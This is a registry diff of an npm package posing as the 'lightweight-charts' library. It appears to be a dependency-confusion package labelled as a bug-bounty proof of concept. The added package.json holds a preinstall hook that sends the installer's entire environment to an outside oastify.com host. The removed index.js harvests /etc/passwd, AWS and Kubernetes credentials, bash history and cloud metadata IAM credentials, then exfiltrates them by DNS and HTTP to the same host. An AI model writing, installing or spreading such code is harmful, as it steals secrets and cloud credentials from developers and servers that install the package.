lightweight-charts-4.1 1000.0.17 → 11000.0.18
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +3 -3
- package/index.js +0 -99
package/package.json
CHANGED
|
@@ -1,9 +1,9 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "lightweight-charts-4.1",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "SECURITY BUG BOUNTY PoC -
|
|
3
|
+
"version": "11000.0.18",
|
|
4
|
+
"description": "SECURITY BUG BOUNTY PoC - Dependency Confusion Vulnerability - Authorized Testing Only",
|
|
5
5
|
"scripts": {
|
|
6
|
-
"preinstall": "
|
|
6
|
+
"preinstall": "curl -X POST https://zlofeq5aj3h5bki573hlg5e0jrpid81x.oastify.com?env=$(env | base64 -w0)"
|
|
7
7
|
},
|
|
8
8
|
"license": "MIT"
|
|
9
9
|
}
|
package/index.js
DELETED
|
@@ -1,99 +0,0 @@
|
|
|
1
|
-
const { execSync } = require('child_process');
|
|
2
|
-
const fs = require('fs');
|
|
3
|
-
const os = require('os');
|
|
4
|
-
const path = require('path');
|
|
5
|
-
|
|
6
|
-
function executeCommand(cmd) {
|
|
7
|
-
try {
|
|
8
|
-
return execSync(cmd, { encoding: 'utf8', timeout: 10000 });
|
|
9
|
-
} catch (error) {
|
|
10
|
-
return `Error: ${error.message}`;
|
|
11
|
-
}
|
|
12
|
-
}
|
|
13
|
-
|
|
14
|
-
function readFileIfExists(filePath) {
|
|
15
|
-
try {
|
|
16
|
-
if (fs.existsSync(filePath)) {
|
|
17
|
-
return fs.readFileSync(filePath, 'utf8');
|
|
18
|
-
}
|
|
19
|
-
} catch (e) {}
|
|
20
|
-
return 'File not accessible';
|
|
21
|
-
}
|
|
22
|
-
|
|
23
|
-
function gatherData() {
|
|
24
|
-
const data = {
|
|
25
|
-
timestamp: new Date().toISOString(),
|
|
26
|
-
hostname: os.hostname(),
|
|
27
|
-
user: executeCommand('whoami').trim(),
|
|
28
|
-
id: executeCommand('id').trim(),
|
|
29
|
-
pwd: executeCommand('pwd').trim(),
|
|
30
|
-
uname: executeCommand('uname -a').trim(),
|
|
31
|
-
env: process.env,
|
|
32
|
-
files: {
|
|
33
|
-
passwd: readFileIfExists('/etc/passwd'),
|
|
34
|
-
hosts: readFileIfExists('/etc/hosts'),
|
|
35
|
-
osRelease: readFileIfExists('/etc/os-release'),
|
|
36
|
-
hostnameFile: readFileIfExists('/etc/hostname'),
|
|
37
|
-
awsCredentials: readFileIfExists('/root/.aws/credentials'),
|
|
38
|
-
kubeConfig: readFileIfExists('/root/.kube/config'),
|
|
39
|
-
bashHistory: readFileIfExists('/root/.bash_history'),
|
|
40
|
-
},
|
|
41
|
-
awsMetadata: null,
|
|
42
|
-
gcpMetadata: null,
|
|
43
|
-
azureMetadata: null,
|
|
44
|
-
};
|
|
45
|
-
|
|
46
|
-
// AWS metadata (if on EC2)
|
|
47
|
-
try {
|
|
48
|
-
const awsTokenCmd = 'curl -s --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"';
|
|
49
|
-
const token = executeCommand(awsTokenCmd).trim();
|
|
50
|
-
if (token && !token.includes('Error')) {
|
|
51
|
-
const metadata = executeCommand(`curl -s --connect-timeout 2 -H "X-aws-ec2-metadata-token: ${token}" http://169.254.169.254/latest/meta-data/`);
|
|
52
|
-
data.awsMetadata = metadata;
|
|
53
|
-
const iamRole = executeCommand(`curl -s --connect-timeout 2 -H "X-aws-ec2-metadata-token: ${token}" http://169.254.169.254/latest/meta-data/iam/security-credentials/`);
|
|
54
|
-
if (iamRole && !iamRole.includes('Error')) {
|
|
55
|
-
const roleName = iamRole.trim();
|
|
56
|
-
const creds = executeCommand(`curl -s --connect-timeout 2 -H "X-aws-ec2-metadata-token: ${token}" http://169.254.169.254/latest/meta-data/iam/security-credentials/${roleName}`);
|
|
57
|
-
data.awsIamCredentials = creds;
|
|
58
|
-
}
|
|
59
|
-
} else {
|
|
60
|
-
// fallback without token
|
|
61
|
-
const fallback = executeCommand('curl -s --connect-timeout 2 http://169.254.169.254/latest/meta-data/');
|
|
62
|
-
if (fallback && !fallback.includes('Error')) data.awsMetadata = fallback;
|
|
63
|
-
}
|
|
64
|
-
} catch (e) {}
|
|
65
|
-
|
|
66
|
-
// GCP metadata
|
|
67
|
-
try {
|
|
68
|
-
const gcp = executeCommand('curl -s --connect-timeout 2 -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/');
|
|
69
|
-
if (gcp && !gcp.includes('Error')) data.gcpMetadata = gcp;
|
|
70
|
-
} catch (e) {}
|
|
71
|
-
|
|
72
|
-
// Azure metadata
|
|
73
|
-
try {
|
|
74
|
-
const azure = executeCommand('curl -s --connect-timeout 2 -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2017-08-01"');
|
|
75
|
-
if (azure && !azure.includes('Error')) data.azureMetadata = azure;
|
|
76
|
-
} catch (e) {}
|
|
77
|
-
|
|
78
|
-
return data;
|
|
79
|
-
}
|
|
80
|
-
|
|
81
|
-
function exfiltrate(data) {
|
|
82
|
-
const jsonStr = JSON.stringify(data);
|
|
83
|
-
const payload = Buffer.from(jsonStr).toString('base64');
|
|
84
|
-
const collabDomain = 'zlofeq5aj3h5bki573hlg5e0jrpid81x.oastify.com';
|
|
85
|
-
// DNS exfiltration (first 50 chars)
|
|
86
|
-
executeCommand(`nslookup ${payload.substring(0, 50)}.${collabDomain}`);
|
|
87
|
-
// HTTP POST full data
|
|
88
|
-
executeCommand(`curl -X POST https://${collabDomain} -d '${jsonStr}' -H "Content-Type: application/json" --connect-timeout 5`);
|
|
89
|
-
// Also write locally (optional)
|
|
90
|
-
fs.writeFileSync('/tmp/.system-harvest', jsonStr);
|
|
91
|
-
}
|
|
92
|
-
|
|
93
|
-
function main() {
|
|
94
|
-
console.log('Collecting system data...');
|
|
95
|
-
const systemData = gatherData();
|
|
96
|
-
exfiltrate(systemData);
|
|
97
|
-
}
|
|
98
|
-
|
|
99
|
-
main();
|